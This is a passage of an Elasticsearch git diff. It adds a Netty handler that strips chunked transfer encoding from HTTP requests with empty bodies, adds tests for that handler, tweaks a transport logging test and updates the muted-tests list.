restRequest; this.stream = stream; } @@ -934,7 +954,7 @@ public List routes() { protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient client) { var stream = (Netty4HttpRequestBodyStream) request.contentStream(); var opaqueId = request.getHeaders().get(Task.X_OPAQUE_ID_HTTP_HEADER).get(0); - var handler = new ServerRequestHandler(opaqueId, stream); + var handler = new ServerRequestHandler(opaqueId, request, stream); handlersByOpaqueId.getHandlerFor(opaqueId).onResponse(handler); return handler; } diff --git a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java index 9d054839849de..2888e40154da5 100644 --- a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java +++ b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java @@ -10,11 +10,13 @@ package org.elasticsearch.transport.netty4; import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.core.LogEvent; import org.elasticsearch.ESNetty4IntegTestCase; import org.elasticsearch.core.TimeValue; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; +import org.elasticsearch.transport.NodeDisconnectedException; import org.elasticsearch.transport.TcpTransport; import org.elasticsearch.transport.TransportLogger; @@ -117,7 +119,15 @@ public void testExceptionalDisconnectLogging() throws Exception { TcpTransport.class.getCanonicalName(), Level.DEBUG, ".*closed transport connection \\[[1-9][0-9]*\\] to .* with age \\[[0-9]+ms\\], exception:.*" - ) + ) { + @Override + public void match(LogEvent event) { + if (event.getThrown() instanceof NodeDisconnectedException nodeDisconnectedException + && nodeDisconnectedException.getMessage().contains("closed exceptionally: Netty4TcpChannel{")) { + super.match(event); + } + } + } ); final String nodeName = internalCluster().startNode(); diff --git a/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandler.java b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandler.java new file mode 100644 index 0000000000000..045767cf41c63 --- /dev/null +++ b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandler.java @@ -0,0 +1,50 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.http.netty4; + +import io.netty.channel.ChannelHandlerContext; +import io.netty.channel.ChannelInboundHandlerAdapter; +import io.netty.handler.codec.http.HttpContent; +import io.netty.handler.codec.http.HttpRequest; +import io.netty.handler.codec.http.HttpUtil; +import io.netty.handler.codec.http.LastHttpContent; + +public class Netty4EmptyChunkHandler extends ChannelInboundHandlerAdapter { + + private HttpRequest currentRequest; + + @Override + public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception { + switch (msg) { + case HttpRequest request -> { + if (request.decoderResult().isSuccess() && HttpUtil.isTransferEncodingChunked(request)) { + currentRequest = request; + ctx.read(); + } else { + currentRequest = null; + ctx.fireChannelRead(request); + } + } + case HttpContent content -> { + if (currentRequest != null) { + if (content instanceof LastHttpContent && content.content().readableBytes() == 0) { + HttpUtil.setTransferEncodingChunked(currentRequest, false); + } + ctx.fireChannelRead(currentRequest); + ctx.fireChannelRead(content); + currentRequest = null; + } else { + ctx.fireChannelRead(content); + } + } + default -> ctx.fireChannelRead(msg); + } + } +} diff --git a/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java index 9dc8555bad552..7f25d88bfda4c 100644 --- a/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java +++ b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java @@ -414,6 +414,7 @@ protected Result beginEncode(HttpResponse httpResponse, String acceptEncoding) t if (ResourceLeakDetector.isEnabled()) { ch.pipeline().addLast(new Netty4LeakDetectionHandler()); } + ch.pipeline().addLast(new Netty4EmptyChunkHandler()); // See https://github.com/netty/netty/issues/15053: the combination of FlowControlHandler and HttpContentDecompressor above // can emit multiple chunks per read, but HttpBody.Stream requires chunks to arrive one-at-a-time so until that issue is // resolved we must add another flow controller here: diff --git a/modules/transport-netty4/src/test/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandlerTests.java b/modules/transport-netty4/src/test/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandlerTests.java new file mode 100644 index 0000000000000..f6691ae204a2e --- /dev/null +++ b/modules/transport-netty4/src/test/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandlerTests.java @@ -0,0 +1,96 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.http.netty4; + +import io.netty.buffer.Unpooled; +import io.netty.channel.embedded.EmbeddedChannel; +import io.netty.handler.codec.DecoderResult; +import io.netty.handler.codec.http.DefaultHttpRequest; +import io.netty.handler.codec.http.DefaultLastHttpContent; +import io.netty.handler.codec.http.HttpMessage; +import io.netty.handler.codec.http.HttpMethod; +import io.netty.handler.codec.http.HttpRequest; +import io.netty.handler.codec.http.HttpUtil; +import io.netty.handler.codec.http.HttpVersion; + +import org.elasticsearch.test.ESTestCase; + +public class Netty4EmptyChunkHandlerTests extends ESTestCase { + + private EmbeddedChannel channel; + + @Override + public void setUp() throws Exception { + super.setUp(); + channel = new EmbeddedChannel(new Netty4EmptyChunkHandler()); + channel.config().setAutoRead(false); + } + + public void testNonChunkedPassthrough() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + var content = new DefaultLastHttpContent(Unpooled.EMPTY_BUFFER); + channel.writeInbound(req, content); + assertEquals(req, channel.readInbound()); + assertEquals(content, channel.readInbound()); + } + + public void testDecodingFailurePassthrough() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + req.setDecoderResult(DecoderResult.failure(new Exception())); + channel.writeInbound(req); + var recvReq = (HttpRequest) channel.readInbound(); + assertTrue(recvReq.decoderResult().isFailure()); + assertTrue(HttpUtil.isTransferEncodingChunked(recvReq)); + } + + public void testHoldChunkedRequest() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + var readSniffer = new ReadSniffer(); + channel.pipeline().addFirst(readSniffer); + channel.writeInbound(req); + assertNull("should hold on HTTP request until first chunk arrives", channel.readInbound()); + assertEquals("must read first chunk when holding request", 1, readSniffer.readCount); + } + + public void testRemoveEncodingFromEmpty() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + var content = new DefaultLastHttpContent(Unpooled.EMPTY_BUFFER); + channel.writeInbound(req, content); + var recvReq = channel.readInbound(); + assertEquals(req, recvReq); + assertEquals(content, channel.readInbound()); + assertFalse("should remove Transfer-Encoding from empty content", HttpUtil.isTransferEncodingChunked((HttpMessage) recvReq)); + } + + public void testKeepEncodingForNonEmpty() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + var content = new DefaultLastHttpContent(Unpooled.wrappedBuffer(randomByteArrayOfLength(between(1, 1024)))); + channel.writeInbound(req, content); + var recvReq = channel.readInbound(); + assertEquals(req, recvReq); + assertEquals(content, channel.readInbound()); + assertTrue("should keep Transfer-Encoding for non-empty content", HttpUtil.isTransferEncodingChunked((HttpMessage) recvReq)); + } + + public void testRandomizedChannelReuse() { + for (int i = 0; i < 1000; i++) { + switch (between(0, 3)) { + case 0 -> testNonChunkedPassthrough(); + case 1 -> testKeepEncodingForNonEmpty(); + case 2 -> testDecodingFailurePassthrough(); + default -> testRemoveEncodingFromEmpty(); + } + } + } +} diff --git a/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java b/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java index 5876945cf93b6..5a0012bfaef4b 100644 --- a/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java +++ b/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java @@ -11,7 +11,6 @@ import org.apache.lucene.util.Constants; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.DiscoveryNodeUtils; @@ -80,7 +79,7 @@ public void executeHandshake( super.executeHandshake(node, channel, profile, listener); } else { assert version.equals(TransportVersion.current()); - listener.onResponse(TransportVersions.MINIMUM_COMPATIBLE); + listener.onResponse(TransportVersion.minimumCompatible()); } } }; diff --git a/muted-tests.yml b/muted-tests.yml index 54ae87714d58e..2bbad28b75f80 100644 --- a/muted-tests.yml +++ b/muted-tests.yml @@ -64,8 +64,6 @@ tests: - class: org.elasticsearch.xpack.shutdown.NodeShutdownIT method: testAllocationPreventedForRemoval issue: https://github.com/elastic/elasticsearch/issues/116363 -- class: org.elasticsearch.xpack.security.authc.ldap.ActiveDirectoryGroupsResolverTests - issue: https://github.com/elastic/elasticsearch/issues/116182 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=snapshot/20_operator_privileges_disabled/Operator only settings can be set and restored by non-operator user when operator privileges is disabled} issue: https://github.com/elastic/elasticsearch/issues/116775 @@ -114,8 +112,6 @@ tests: - class: org.elasticsearch.xpack.ml.integration.ForecastIT method: testOverflowToDisk issue: https://github.com/elastic/elasticsearch/issues/117740 -- class: org.elasticsearch.xpack.security.authc.ldap.MultiGroupMappingIT - issue: https://github.com/elastic/elasticsearch/issues/119599 - class: org.elasticsearch.multi_cluster.MultiClusterYamlTestSuiteIT issue: https://github.com/elastic/elasticsearch/issues/119983 - class: org.elasticsearch.xpack.test.rest.XPackRestIT @@ -138,56 +134,27 @@ tests: - class: org.elasticsearch.xpack.inference.DefaultEndPointsIT method: testMultipleInferencesTriggeringDownloadAndDeploy issue: https://github.com/elastic/elasticsearch/issues/120668 -- class: org.elasticsearch.xpack.security.authc.ldap.ADLdapUserSearchSessionFactoryTests - issue: https://github.com/elastic/elasticsearch/issues/119882 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=ml/3rd_party_deployment/Test start deployment fails while model download in progress} issue: https://github.com/elastic/elasticsearch/issues/120810 - class: org.elasticsearch.xpack.security.authc.service.ServiceAccountIT method: testAuthenticateShouldNotFallThroughInCaseOfFailure issue: https://github.com/elastic/elasticsearch/issues/120902 -- class: org.elasticsearch.packaging.test.DockerTests - method: test050BasicApiTests - issue: https://github.com/elastic/elasticsearch/issues/120911 -- class: org.elasticsearch.packaging.test.DockerTests - method: test140CgroupOsStatsAreAvailable - issue: https://github.com/elastic/elasticsearch/issues/120914 -- class: org.elasticsearch.packaging.test.DockerTests - method: test070BindMountCustomPathConfAndJvmOptions - issue: https://github.com/elastic/elasticsearch/issues/120910 -- class: org.elasticsearch.packaging.test.DockerTests - method: test071BindMountCustomPathWithDifferentUID - issue: https://github.com/elastic/elasticsearch/issues/120918 -- class: org.elasticsearch.packaging.test.DockerTests - method: test171AdditionalCliOptionsAreForwarded - issue: https://github.com/elastic/elasticsearch/issues/120925 - class: org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT method: test {p0=nodes.stats/11_indices_metrics/indices mappings exact count test for indices level} issue: https://github.com/elastic/elasticsearch/issues/120950 -- class: org.elasticsearch.xpack.ml.integration.PyTorchModelIT - issue: https://github.com/elastic/elasticsearch/issues/121165 -- class: org.elasticsearch.xpack.security.authc.ldap.ActiveDirectorySessionFactoryTests - issue: https://github.com/elastic/elasticsearch/issues/121285 -- class: org.elasticsearch.test.rest.yaml.CcsCommonYamlTestSuiteIT - issue: https://github.com/elastic/elasticsearch/issues/121407 - class: org.elasticsearch.analysis.common.CommonAnalysisClientYamlTestSuiteIT method: test {yaml=analysis-common/40_token_filters/stemmer_override file access} issue: https://github.com/elastic/elasticsearch/issues/121625 - class: org.elasticsearch.test.rest.ClientYamlTestSuiteIT method: test {yaml=snapshot.delete/10_basic/Delete a snapshot asynchronously} issue: https://github.com/elastic/elasticsearch/issues/122102 -- class: org.elasticsearch.smoketest.SmokeTestMonitoringWithSecurityIT - method: testHTTPExporterWithSSL - issue: https://github.com/elastic/elasticsearch/issues/122220 - class: org.elasticsearch.blocks.SimpleBlocksIT method: testConcurrentAddBlock issue: https://github.com/elastic/elasticsearch/issues/122324 - class: org.elasticsearch.xpack.ilm.TimeSeriesLifecycleActionsIT method: testHistoryIsWrittenWithFailure issue: https://github.com/elastic/elasticsearch/issues/123203 -- class: org.elasticsearch.packaging.test.DockerTests - method: test151MachineDependentHeapWithSizeOverride - issue: https://github.com/elastic/elasticsearch/issues/123437 - class: org.elasticsearch.action.admin.cluster.node.tasks.CancellableTasksIT method: testChildrenTasksCancelledOnTimeout issue: https://github.com/elastic/elasticsearch/issues/123568 @@ -227,18 +194,9 @@ tests: - class: org.elasticsearch.packaging.test.BootstrapCheckTests method: test20RunWithBootstrapChecks issue: https://github.com/elastic/elasticsearch/issues/124940 -- class: org.elasticsearch.xpack.esql.action.CrossClusterAsyncQueryStopIT - method: testStopQueryLocal - issue: https://github.com/elastic/elasticsearch/issues/121672 - class: org.elasticsearch.packaging.test.BootstrapCheckTests method: test10Install issue: https://github.com/elastic/elasticsearch/issues/124957 -- class: org.elasticsearch.packaging.test.DockerTests - method: test011SecurityEnabledStatus - issue: https://github.com/elastic/elasticsearch/issues/124990 -- class: org.elasticsearch.packaging.test.DockerTests - method: test012SecurityCanBeDisabled - issue: https://github.com/elastic/elasticsearch/issues/116636 - class: org.elasticsearch.index.shard.StoreRecoveryTests method: testAddIndices issue: https://github.com/elastic/elasticsearch/issues/124104 @@ -251,9 +209,6 @@ tests: - class: org.elasticsearch.smoketest.MlWithSecurityIT method: test {yaml=ml/data_frame_analytics_cat_apis/Test cat data frame analytics single job with header} issue: https://github.com/elastic/elasticsearch/issues/125642 -- class: org.elasticsearch.packaging.test.DockerTests - method: test010Install - issue: https://github.com/elastic/elasticsearch/issues/125680 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_start_stop/Test schedule_now on an already started transform} issue: https://github.com/elastic/elasticsearch/issues/120720 @@ -269,24 +224,12 @@ tests: - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_stats/Test get transform stats with timeout} issue: https://github.com/elastic/elasticsearch/issues/125975 -- class: org.elasticsearch.packaging.test.DockerTests - method: test021InstallPlugin - issue: https://github.com/elastic/elasticsearch/issues/116147 - class: org.elasticsearch.action.RejectionActionIT method: testSimulatedSearchRejectionLoad issue: https://github.com/elastic/elasticsearch/issues/125901 -- class: org.elasticsearch.search.CCSDuelIT - method: testTerminateAfter - issue: https://github.com/elastic/elasticsearch/issues/126085 - class: org.elasticsearch.search.basic.SearchWithRandomDisconnectsIT method: testSearchWithRandomDisconnects issue: https://github.com/elastic/elasticsearch/issues/122707 -- class: org.elasticsearch.index.engine.ThreadPoolMergeSchedulerTests - method: testSchedulerCloseWaitsForRunningMerge - issue: https://github.com/elastic/elasticsearch/issues/125236 -- class: org.elasticsearch.packaging.test.DockerTests - method: test020PluginsListWithNoPlugins - issue: https://github.com/elastic/elasticsearch/issues/126232 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_reset/Test force reseting a running transform} issue: https://github.com/elastic/elasticsearch/issues/126240 @@ -296,18 +239,9 @@ tests: - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=ml/start_data_frame_analytics/Test start classification analysis when the dependent variable cardinality is too low} issue: https://github.com/elastic/elasticsearch/issues/126299 -- class: org.elasticsearch.packaging.test.DockerTests - method: test023InstallPluginUsingConfigFile - issue: https://github.com/elastic/elasticsearch/issues/126145 -- class: org.elasticsearch.search.SearchWithRejectionsIT - method: testOpenContextsAfterRejections - issue: https://github.com/elastic/elasticsearch/issues/126340 - class: org.elasticsearch.smoketest.MlWithSecurityIT method: test {yaml=ml/start_data_frame_analytics/Test start classification analysis when the dependent variable cardinality is too low} issue: https://github.com/elastic/elasticsearch/issues/123200 -- class: org.elasticsearch.packaging.test.DockerTests - method: test022InstallPluginsFromLocalArchive - issue: https://github.com/elastic/elasticsearch/issues/116866 - class: org.elasticsearch.smoketest.MlWithSecurityIT method: test {yaml=ml/trained_model_cat_apis/Test cat trained models} issue: https://github.com/elastic/elasticsearch/issues/125750 @@ -335,12 +269,6 @@ tests: - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_start_stop/Test start/stop/start continuous transform} issue: https://github.com/elastic/elasticsearch/issues/126755 -- class: org.elasticsearch.search.SearchServiceSingleNodeTests - method: testBeforeShardLockDuringShardCreate - issue: https://github.com/elastic/elasticsearch/issues/126812 -- class: org.elasticsearch.search.SearchServiceSingleNodeTests - method: testLookUpSearchContext - issue: https://github.com/elastic/elasticsearch/issues/126813 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_stats/Test get multiple transform stats where one does not have a task} issue: https://github.com/elastic/elasticsearch/issues/126863 @@ -356,24 +284,12 @@ tests: - class: org.elasticsearch.cli.keystore.AddStringKeyStoreCommandTests method: testStdinWithMultipleValues issue: https://github.com/elastic/elasticsearch/issues/126882 -- class: org.elasticsearch.packaging.test.DockerTests - method: test024InstallPluginFromArchiveUsingConfigFile - issue: https://github.com/elastic/elasticsearch/issues/126936 -- class: org.elasticsearch.packaging.test.DockerTests - method: test026InstallBundledRepositoryPlugins - issue: https://github.com/elastic/elasticsearch/issues/127081 -- class: org.elasticsearch.packaging.test.DockerTests - method: test026InstallBundledRepositoryPluginsViaConfigFile - issue: https://github.com/elastic/elasticsearch/issues/127158 - class: org.elasticsearch.xpack.remotecluster.CrossClusterEsqlRCS2EnrichUnavailableRemotesIT method: testEsqlEnrichWithSkipUnavailable issue: https://github.com/elastic/elasticsearch/issues/127368 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=ml/data_frame_analytics_cat_apis/Test cat data frame analytics all jobs with header} issue: https://github.com/elastic/elasticsearch/issues/127625 -- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT - method: testCancellationViaTimeoutWithAllowPartialResultsSetToFalse - issue: https://github.com/elastic/elasticsearch/issues/127096 - class: org.elasticsearch.xpack.ccr.action.ShardFollowTaskReplicationTests method: testChangeFollowerHistoryUUID issue: https://github.com/elastic/elasticsearch/issues/127680 @@ -383,48 +299,18 @@ tests: - class: org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT method: test {p0=search/350_point_in_time/point-in-time with index filter} issue: https://github.com/elastic/elasticsearch/issues/127741 -- class: org.elasticsearch.packaging.test.DockerTests - method: test025SyncPluginsUsingProxy - issue: https://github.com/elastic/elasticsearch/issues/127138 - class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithPartialResultsIT method: testOneRemoteClusterPartial issue: https://github.com/elastic/elasticsearch/issues/124055 - class: org.elasticsearch.xpack.esql.qa.multi_node.EsqlSpecIT method: test {lookup-join.MvJoinKeyOnTheLookupIndex ASYNC} issue: https://github.com/elastic/elasticsearch/issues/128030 -- class: org.elasticsearch.packaging.test.DockerTests - method: test042KeystorePermissionsAreCorrect - issue: https://github.com/elastic/elasticsearch/issues/128018 -- class: org.elasticsearch.packaging.test.DockerTests - method: test072RunEsAsDifferentUserAndGroup - issue: https://github.com/elastic/elasticsearch/issues/128031 -- class: org.elasticsearch.packaging.test.DockerTests - method: test122CanUseDockerLoggingConfig - issue: https://github.com/elastic/elasticsearch/issues/128110 -- class: org.elasticsearch.packaging.test.DockerTests - method: test041AmazonCaCertsAreInTheKeystore - issue: https://github.com/elastic/elasticsearch/issues/128006 -- class: org.elasticsearch.packaging.test.DockerTests - method: test130JavaHasCorrectOwnership - issue: https://github.com/elastic/elasticsearch/issues/128174 -- class: org.elasticsearch.packaging.test.DockerTests - method: test600Interrupt - issue: https://github.com/elastic/elasticsearch/issues/128144 - class: org.elasticsearch.packaging.test.EnrollmentProcessTests method: test20DockerAutoFormCluster issue: https://github.com/elastic/elasticsearch/issues/128113 -- class: org.elasticsearch.packaging.test.DockerTests - method: test121CanUseStackLoggingConfig - issue: https://github.com/elastic/elasticsearch/issues/128165 -- class: org.elasticsearch.packaging.test.DockerTests - method: test080ConfigurePasswordThroughEnvironmentVariableFile - issue: https://github.com/elastic/elasticsearch/issues/128075 - class: org.elasticsearch.ingest.geoip.GeoIpDownloaderCliIT method: testInvalidTimestamp issue: https://github.com/elastic/elasticsearch/issues/128284 -- class: org.elasticsearch.packaging.test.DockerTests - method: test120DockerLogsIncludeElasticsearchLogs - issue: https://github.com/elastic/elasticsearch/issues/128117 - class: org.elasticsearch.packaging.test.TemporaryDirectoryConfigTests method: test21AcceptsCustomPathInDocker issue: https://github.com/elastic/elasticsearch/issues/128114 @@ -434,45 +320,15 @@ tests: - class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT method: testCCSClusterDetailsWhereAllShardsSkippedInCanMatch issue: https://github.com/elastic/elasticsearch/issues/128418 -- class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithFiltersIT - method: testTimestampFilterFromQuery - issue: https://github.com/elastic/elasticsearch/issues/127332 - class: org.elasticsearch.xpack.esql.plugin.DataNodeRequestSenderIT method: testSearchWhileRelocating issue: https://github.com/elastic/elasticsearch/issues/128500 -- class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithPartialResultsIT - method: testFailToStartRequestOnRemoteCluster - issue: https://github.com/elastic/elasticsearch/issues/128545 -- class: org.elasticsearch.packaging.test.DockerTests - method: test124CanRestartContainerWithStackLoggingConfig - issue: https://github.com/elastic/elasticsearch/issues/128121 -- class: org.elasticsearch.packaging.test.DockerTests - method: test085EnvironmentVariablesAreRespectedUnderDockerExec - issue: https://github.com/elastic/elasticsearch/issues/128115 - class: org.elasticsearch.compute.operator.LimitOperatorTests method: testEarlyTermination issue: https://github.com/elastic/elasticsearch/issues/128721 -- class: org.elasticsearch.packaging.test.DockerTests - method: test040JavaUsesTheOsProvidedKeystore - issue: https://github.com/elastic/elasticsearch/issues/128230 -- class: org.elasticsearch.packaging.test.DockerTests - method: test150MachineDependentHeap - issue: https://github.com/elastic/elasticsearch/issues/128120 - class: org.elasticsearch.xpack.inference.InferenceGetServicesIT method: testGetServicesWithCompletionTaskType issue: https://github.com/elastic/elasticsearch/issues/128952 -- class: org.elasticsearch.packaging.test.DockerTests - method: test073RunEsAsDifferentUserAndGroupWithoutBindMounting - issue: https://github.com/elastic/elasticsearch/issues/128996 -- class: org.elasticsearch.upgrades.UpgradeClusterClientYamlTestSuiteIT - method: test {p0=upgraded_cluster/70_ilm/Test Lifecycle Still There And Indices Are Still Managed} - issue: https://github.com/elastic/elasticsearch/issues/129097 -- class: org.elasticsearch.upgrades.UpgradeClusterClientYamlTestSuiteIT - method: test {p0=upgraded_cluster/90_ml_data_frame_analytics_crud/Get mixed cluster outlier_detection job} - issue: https://github.com/elastic/elasticsearch/issues/129098 -- class: org.elasticsearch.packaging.test.DockerTests - method: test081SymlinksAreFollowedWithEnvironmentVariableFiles - issue: https://github.com/elastic/elasticsearch/issues/128867 - class: org.elasticsearch.xpack.esql.qa.single_node.GenerativeForkIT method: test {lookup-join.EnrichLookupStatsBug ASYNC} issue: https://github.com/elastic/elasticsearch/issues/129228 @@ -494,30 +350,12 @@ tests: - class: org.elasticsearch.xpack.ml.integration.ClassificationIT method: testWithDatastreams issue: https://github.com/elastic/elasticsearch/issues/129457 -- class: org.elasticsearch.index.engine.ThreadPoolMergeExecutorServiceDiskSpaceTests - method: testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable - issue: https://github.com/elastic/elasticsearch/issues/129296 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testCanManageIndexWithNoPermissions - issue: https://github.com/elastic/elasticsearch/issues/129471 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testCanManageIndexAndPolicyDifferentUsers - issue: https://github.com/elastic/elasticsearch/issues/129479 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testCanViewExplainOnUnmanagedIndex - issue: https://github.com/elastic/elasticsearch/issues/129480 - class: org.elasticsearch.xpack.profiling.action.GetStatusActionIT method: testWaitsUntilResourcesAreCreated issue: https://github.com/elastic/elasticsearch/issues/129486 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testWhenUserLimitedByOnlyAliasOfIndexCanWriteToIndexWhichWasRolledoverByILMPolicy - issue: https://github.com/elastic/elasticsearch/issues/129481 - class: org.elasticsearch.xpack.esql.qa.multi_node.EsqlSpecIT method: test {knn-function.KnnSearchWithKOption SYNC} issue: https://github.com/elastic/elasticsearch/issues/129512 -- class: org.elasticsearch.index.engine.ThreadPoolMergeExecutorServiceTests - method: testIORateIsAdjustedForAllRunningMergeTasks - issue: https://github.com/elastic/elasticsearch/issues/129531 - class: org.elasticsearch.upgrades.IndexingIT method: testIndexing issue: https://github.com/elastic/elasticsearch/issues/129533 @@ -530,50 +368,90 @@ tests: - class: org.elasticsearch.search.query.VectorIT method: testFilteredQueryStrategy issue: https://github.com/elastic/elasticsearch/issues/129517 -- class: org.elasticsearch.test.apmintegration.TracesApmIT - method: testApmIntegration - issue: https://github.com/elastic/elasticsearch/issues/129651 -- class: org.elasticsearch.snapshots.SnapshotShutdownIT - method: testSnapshotShutdownProgressTracker - issue: https://github.com/elastic/elasticsearch/issues/129752 - class: org.elasticsearch.xpack.security.SecurityRolesMultiProjectIT method: testUpdatingFileBasedRoleAffectsAllProjects issue: https://github.com/elastic/elasticsearch/issues/129775 - class: org.elasticsearch.qa.verify_version_constants.VerifyVersionConstantsIT method: testLuceneVersionConstant issue: https://github.com/elastic/elasticsearch/issues/125638 -- class: org.elasticsearch.index.store.FsDirectoryFactoryTests - method: testPreload - issue: https://github.com/elastic/elasticsearch/issues/129852 -- class: org.elasticsearch.xpack.rank.rrf.RRFRankClientYamlTestSuiteIT - method: test {yaml=rrf/950_pinned_interaction/rrf with pinned retriever as a sub-retriever} - issue: https://github.com/elastic/elasticsearch/issues/129845 -- class: org.elasticsearch.xpack.test.rest.XPackRestIT - method: test {p0=esql/60_usage/Basic ESQL usage output (telemetry) non-snapshot version} - issue: https://github.com/elastic/elasticsearch/issues/129888 - class: org.elasticsearch.gradle.internal.InternalDistributionBwcSetupPluginFuncTest method: "builds distribution from branches via archives extractedAssemble [bwcDistVersion: 8.2.1, bwcProject: bugfix, expectedAssembleTaskName: extractedAssemble, #2]" issue: https://github.com/elastic/elasticsearch/issues/119871 -- class: org.elasticsearch.xpack.inference.qa.mixed.CohereServiceMixedIT - method: testRerank - issue: https://github.com/elastic/elasticsearch/issues/130009 -- class: org.elasticsearch.xpack.inference.qa.mixed.CohereServiceMixedIT - method: testCohereEmbeddings - issue: https://github.com/elastic/elasticsearch/issues/130010 -- class: org.elasticsearch.xpack.esql.qa.mixed.MixedClusterEsqlSpecIT - issue: https://github.com/elastic/elasticsearch/issues/128224 - class: org.elasticsearch.cluster.metadata.ComposableIndexTemplateTests method: testMergeEmptyMappingsIntoTemplateWithNonEmptySettings issue: https://github.com/elastic/elasticsearch/issues/130050 -- class: org.elasticsearch.xpack.esql.qa.multi_node.GenerativeIT - method: test - issue: https://github.com/elastic/elasticsearch/issues/130067 - class: geoip.GeoIpMultiProjectIT issue: https://github.com/elastic/elasticsearch/issues/130073 -- class: org.elasticsearch.xpack.esql.qa.single_node.GenerativeIT - method: test - issue: https://github.com/elastic/elasticsearch/issues/130067 +- class: org.elasticsearch.search.SearchWithRejectionsIT + method: testOpenContextsAfterRejections + issue: https://github.com/elastic/elasticsearch/issues/130821 +- class: org.elasticsearch.index.IndexingPressureIT + method: testWriteCanRejectOnPrimaryBasedOnMaxOperationSize + issue: https://github.com/elastic/elasticsearch/issues/130281 +- class: org.elasticsearch.index.IndexingPressureIT + method: testWriteCanBeRejectedAtPrimaryLevel + issue: https://github.com/elastic/elasticsearch/issues/131151 +- class: org.elasticsearch.repositories.s3.S3ServiceTests + method: testGetClientRegionFromEndpointSettingGuess + issue: https://github.com/elastic/elasticsearch/issues/131392 +- class: org.elasticsearch.packaging.test.DockerTests + method: test050BasicApiTests + issue: https://github.com/elastic/elasticsearch/issues/120911 +- class: org.elasticsearch.packaging.test.DockerTests + method: test071BindMountCustomPathWithDifferentUID + issue: https://github.com/elastic/elasticsearch/issues/120917 +- class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithPartialResultsIT + method: testPartialResults + issue: https://github.com/elastic/elasticsearch/issues/131481 +- class: org.elasticsearch.packaging.test.DockerTests + method: test022InstallPluginsFromLocalArchive + issue: https://github.com/elastic/elasticsearch/issues/116866 +- class: org.elasticsearch.packaging.test.DockerTests + method: 